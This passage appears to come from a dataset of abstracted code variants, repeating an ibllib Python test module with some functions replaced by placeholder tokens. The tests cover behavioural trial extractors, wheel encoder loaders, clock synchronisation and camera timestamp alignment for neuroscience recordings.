def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n <function token>\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = 
next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n <function token>\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n 
path = self.main_path.joinpath('data', 'wheel', 'ge5')\n        for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n            dy = raw._load_encoder_events_file_ge5(file_events)\n            self.assertTrue(dy.size > 6)\n\n    def test_encoder_positions_corrupts(self):\n        path = self.main_path.joinpath('data', 'wheel', 'ge5')\n        for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n            dy = raw._load_encoder_positions_file_ge5(file_position)\n            self.assertTrue(dy.size > 18)\n        path = self.main_path.joinpath('data', 'wheel', 'lt5')\n        for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n            dy = raw._load_encoder_positions_file_lt5(file_position)\n            self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n    save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n        'some_file.npy')\n    var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n    def _extract(self, **kwargs) ->tuple:\n        csv = pd.DataFrame([1, 2, 3])\n        ssv = pd.DataFrame([1, 2, 3])\n        tsv = pd.DataFrame([1, 2, 3])\n        npy = np.array([1, 2, 3])\n        return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n    def setUp(self) ->None:\n        self.tempdir = tempfile.TemporaryDirectory()\n        self.session_path = self.tempdir.name\n        self.mock_extractor = MockExtracor(self.session_path)\n\n    def test_saving_method(self):\n        data, paths = self.mock_extractor.extract(save=True)\n        self.assertTrue(all([x.exists() for x in paths]))\n\n    def tearDown(self):\n        self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n    def test_groom_pin_state(self):\n        fps = 60\n        t_offset = 39.4\n        ts = np.arange(0, 10, 1 / fps) + t_offset\n        ts += np.full_like(ts, 0.0001).cumsum()\n        n_pulses = 2\n        pulse_width = 0.3\n        duty = 0.5\n        gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n            'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n        gpio['polarities'][1::2] = -1\n        aud_offset = 40.0\n        audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n            'polarities']}\n        for p in range(n_pulses):\n            i = p * 2\n            rise = pulse_width * p + duty * p + 1\n            audio['times'][i] = aud_offset + rise\n            audio['times'][i + 1] = audio['times'][i] + pulse_width\n            rise += t_offset\n            gpio['indices'][i] = np.where(ts > rise)[0][0]\n            gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n        gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n        self.assertEqual(audio, audio_, \"Audio dict shouldn't be affected\")\n        np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n            40.033333, 40.05])\n        delay = 0.08\n        pulse_width = 1e-05\n        t = audio['times'][0] + delay\n        audio['times'] = np.sort(np.append(audio['times'], [t, t +\n            pulse_width, 80]))\n        audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n        audio['polarities'][1::2] = -1\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n            =0.005)\n        self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n        audio['times'][4] -= 0.3\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n            tolerance=0.1, min_diff=0.005)\n        self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n        self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n    def test_attribute_times(self, display=False):\n        tsa = np.linspace(0, 60, 60 * 4)[:60]\n        tsb = np.linspace(0, 60, 60 * 3)[:45]\n        tsa = np.sort(np.append(tsa, 0.4))\n        tsb = np.sort(np.append(tsb, 0.41))\n        if display:\n            from ibllib.plots import vertical_lines\n            import matplotlib.pyplot as plt\n            vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n            vertical_lines(tsa, linestyle=':', 
color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, 
np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n <function token>\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n <function token>\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n 
trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += 
np.full_like(ts, 0.0001).cumsum()\n        n_pulses = 2\n        pulse_width = 0.3\n        duty = 0.5\n        gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n            'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n        gpio['polarities'][1::2] = -1\n        aud_offset = 40.0\n        audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n            'polarities']}\n        for p in range(n_pulses):\n            i = p * 2\n            rise = pulse_width * p + duty * p + 1\n            audio['times'][i] = aud_offset + rise\n            audio['times'][i + 1] = audio['times'][i] + pulse_width\n            rise += t_offset\n            gpio['indices'][i] = np.where(ts > rise)[0][0]\n            gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n        gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n        self.assertEqual(audio, audio_, \"Audio dict shouldn't be affected\")\n        np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n            40.033333, 40.05])\n        delay = 0.08\n        pulse_width = 1e-05\n        t = audio['times'][0] + delay\n        audio['times'] = np.sort(np.append(audio['times'], [t, t +\n            pulse_width, 80]))\n        audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n        audio['polarities'][1::2] = -1\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n            =0.005)\n        self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n        audio['times'][4] -= 0.3\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n            tolerance=0.1, min_diff=0.005)\n        self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n        self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n    def test_attribute_times(self, display=False):\n        tsa = np.linspace(0, 60, 60 * 4)[:60]\n        tsb = np.linspace(0, 60, 60 * 3)[:45]\n        tsa = np.sort(np.append(tsa, 0.4))\n        tsb = np.sort(np.append(tsb, 0.41))\n        if display:\n            from ibllib.plots import vertical_lines\n            import matplotlib.pyplot as plt\n            vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n            vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n            plt.legend()\n        matches = camera.attribute_times(tsa, tsb)\n        expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n            18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n            40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n        np.testing.assert_array_equal(matches, expected)\n        self.assertEqual(matches.size, tsb.size)\n        matches = camera.attribute_times(tsa, tsb, take='nearest')\n        expected[np.r_[1:3]] = expected[1:3] + 1\n        np.testing.assert_array_equal(matches, expected)\n        matches = camera.attribute_times(tsa, tsb, take='after')\n        missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n            25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n        expected[missing] = -1\n        np.testing.assert_array_equal(matches, expected)\n        matches = camera.attribute_times(tsa, tsb, tol=0.05)\n        expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n            49, 53, 57])\n        np.testing.assert_array_equal(matches[matches > -1], expected)\n        matches = camera.attribute_times(tsa, tsb, injective=False, take=\n            'nearest')\n        expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n            18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n            40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n        np.testing.assert_array_equal(matches, expected)\n        with self.assertRaises(ValueError):\n            camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n    def setUp(self):\n        self.main_path = Path(__file__).parent\n        self.training_lt5 = {'path': 
self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n <function token>\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files 
= biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n <function token>\n <function token>\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n 